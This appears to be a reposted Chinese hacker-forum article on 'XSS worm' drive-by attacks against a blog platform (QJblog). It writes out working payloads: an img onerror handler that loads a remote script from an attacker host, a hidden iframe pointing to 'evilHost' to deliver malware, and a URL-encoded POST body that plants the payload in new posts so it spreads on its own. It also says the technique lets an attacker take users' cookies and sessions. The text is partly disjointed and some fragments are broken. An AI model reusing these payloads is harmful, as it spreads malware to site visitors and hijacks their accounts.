您的位置:360文档中心› xss worm挂马随想

xss worm挂马随想

合集下载
  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

xss worm挂马随想
阅读:48 时间:2009-8-25 5:31:11 整理:华夏黑盟
------------------------------------------------------------------
author: cnryan @/cnryan
关于Xss worm挂马攻击在早前已经横空出世了,虽然说这是国内第一起利用跨站挂马的案例,但不可否认,Ajax hacking已在web2.0出现多年,能预料的人早已充分利用了.
所以不能说这是第一起xss worm挂马,只能说是第一次发现的。
一 " onerror='javascript:var s=document.createElement("script");s.src="http://myhost/1.js";document.body.appendChild(s);' "
1> 如何挂马?
我尝试用最愚蠢的方法。
XSS插入点 嵌入iframe
如果是纯粹的挂马,只要添加一个<iframe>就达到挂马的效果
var i=document.createElement("iframe");i.src="http://evilHost";document.body.appendChild(i);
结合在一起:
http://1.jpg" onerror='javascript:var s=document.createElement("script");var i=document.createElement("iframe");s.src="http://myhost/1.js";i.src="http://evilHost";document.body.appendChild(s);document.body.appendChild(i);' "
xss worm挂马,这只是我理解的范畴,它不仅仅如此吧!
以上纯熟YY,见谅!
二 xss worm与xss worm挂马
XSS WORM与XSS WORM挂马不是一样的吗?!这是我一直存在的误区。
一只XSS WORM本身就具有自动感染和传播的功能,在传播过程中它可以实现复制自身感染片段.
而XSS WORM挂马则是xss worm升级版的利用,个中区别与最大的实质就是挂马。
够笨吧,加载JS同时也iframe一个页
2> 传播
JS的作用就是模拟发表一篇文章,图片的XSS也是在文章处,构造数据不忘插入一个IMG XSS,以达到能自动传播。
POST的数据:
QJ_Other1=%CE%DE&QJ_Title=test&QJ_Other3=A&QJ_CatId=6&QJ_CatName=CatName&QJ_CatId2=0&QJ_Content=cnryan%20is%20my%20hero&QJ_Tags=
但它的影响就更为广阔,它不仅针对站内用户,更直接对所有的web浏览者造成威胁,传播空间愈加蔓延。
三 传播与挂马
我在《QJblog xss worm分析与利用》中并没添加到能实现传播的功能,
再来看下这个BUG,是通过IMG标签实现XSS的,创建事件onerror来调用JS。
code:
好混乱!
其实只是复制自身感染片段(以至传播)
每一次刷新XSS的页面就会多一个iframe。
在XSS点插用JS,同时插入iframe;
在XSS点只插入JS,JS写iframe
哪个灵活因人而异
iframe的目的在于挂马,不可缺少,大小属性设置为0
hoho
如果单用xss worm挂马刷流量也够吓人的.
在QJ_Content变量添加图片:
QJ_Content=cnryan+is+my+hero%3CIMG+onerror%3D%27javascript%3Avar+s%3Ddocument.createElement%28%22script%22%29%3Bvar+i%3Ddocument.createElement%28%22iframe%22%29%3Bs.src%3D%22http%3A%2F%2F127.0.0.1%2Fqjblog%2F1.js%22%3Bi.src%3D%22http%3A%2F%%22%3Bdocument.body.appendChild%28s%29%3Bdocument.body.appendChild%28i%29%3B%27+src%3D%22http%3A%2F%2Fdfsd.jpg%22+%3F%3F%3E
xss worm挂马顾名思义是结合挂马技术与xss worm繁生出来的一种攻击方式,就是在Web2.0蠕虫的传播同时实施疯狂式地挂马。
这种危害与影响是十分巨大的,Web2.0蠕虫一旦爆发,能在一瞬间感染大型的SNS网站成上万的用户.
它传播效率会呈几何级数提高.
像QQ这种场景的挂马更是能一针见血。
xss worm是针对站内所有可信任用户,具有会话的用户,
远程攻击者可以利用这个渠道访问用户的Cookie和会话信息,通过跨站引用一个JS文件,创建个XMLHttpRequest对象,实施xss。
xss worm挂马建立xss worm上,在其片段也不过添加一个挂马成分而已,
相关文档
最新文档